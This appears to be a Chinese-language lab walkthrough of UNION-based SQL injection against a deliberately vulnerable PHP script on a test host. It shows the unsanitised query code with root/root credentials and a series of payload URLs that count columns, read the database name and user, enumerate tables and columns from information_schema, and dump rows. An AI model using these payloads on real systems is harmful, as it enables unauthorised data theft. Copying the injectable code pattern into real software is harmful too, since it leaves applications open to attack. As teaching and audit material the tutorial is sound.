数据表ganyuan  后端代码 ``` $id=$_GET['id']; var_dump($id); $query="select * from ganyuan where id=$id"; echo "<br>"; echo $query; $link=mysqli_connect("localhost","root","root",$dbname = "test"); mysqli_select_db($link,'test'); if ($res=mysqli_query($link,$query)) { $rows=mysqli_fetch_array($res);//MYSQLI_ASSOC，MYSQLI_NUM或MYSQLI_BOTH; var_dump($rows); }else{ echo $res.'|||'; } ``` 1、orderby确定列数（超过9不会返回数据，所以确定该表9列） ``` http://www.test.com/audit/sql.php?id=1%20order%20by%209 http://www.test.com/audit/sql.php?id=1%20union%20select%201,2,3,4,5,6,7,8,9; ``` 查出数据库名以及mysql用户名 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%20/*!database()*/,/*!user()*/,3,4,5,6,7,8,9; ```  查出表名 原sql查询单条数据的时候，默认返回的是第一个表名，如果需要查询其他的表名则可以通过添加limit 0,1 ~limit n,1来实现 ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27; ```  ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema%20=%20%27test%27%20limit%203,1; ```  根据表查询表有哪些字段（通过加limit 0,1 ~ limit 8,1） ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,column_name,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema%20=%20%27test%27%20and%20table_name=%27ganyuan%27%20limit%208,1; ```  ``` http://www.test.com/audit/sql.php?id=-1%20union%20select%201,concat_ws(char(32,58,32),id,name,sex,star,pos,url,seniority,profession),3,4,5,6,7,8,9%20from%20ganyuan%20limit%202,1; ```